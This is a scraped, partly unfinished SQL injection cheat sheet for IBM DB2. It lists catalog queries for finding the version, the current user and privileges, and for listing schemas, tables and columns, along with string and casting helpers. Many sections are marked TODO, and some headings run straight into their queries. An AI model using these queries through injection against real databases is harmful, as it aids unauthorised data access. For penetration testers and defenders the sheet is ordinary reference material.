Hacking - SQL Injection Cheat Sheet (DB2)

Versionselect versionnumber, version_timestamp from sysibm.sysversions;
Commentsselect blah from foo; – comment like this
Current User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users
N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
List Password HashesN/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges
select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
List DBA AccountsTODO
Current Databaseselect current server from sysibm.sysdummy1;
List DatabasesSELECT schemaname FROM syscat.schemata;
List Columnsselect name, tbname, coltype from sysibm.syscolumns;
List Tablesselect name from sysibm.systables;
Find Tables From Column NameTODO
Select Nth Row
select name from (SELECT name FROM sysibm.systables order by 
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth CharSELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; – returns b
Bitwise ANDThis page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value → Charselect chr(65) from sysibm.sysdummy1; – returns 'A'
Char → ASCII Valueselect ascii('A') from sysibm.sysdummy1; – returns 65
Casting
SELECT cast('123' as integer) FROM sysibm.sysdummy1;|
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
If StatementTODO
Case StatementTODO
Avoiding QuotesTODO
Time Delay???. See Heavy Queries article for some ideas.
Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressTODO
Location of DB filesTODO
Default/System DatabasesTODO

References

https://www.michaelboman.org/books/sql-injection-cheat-sheet-db2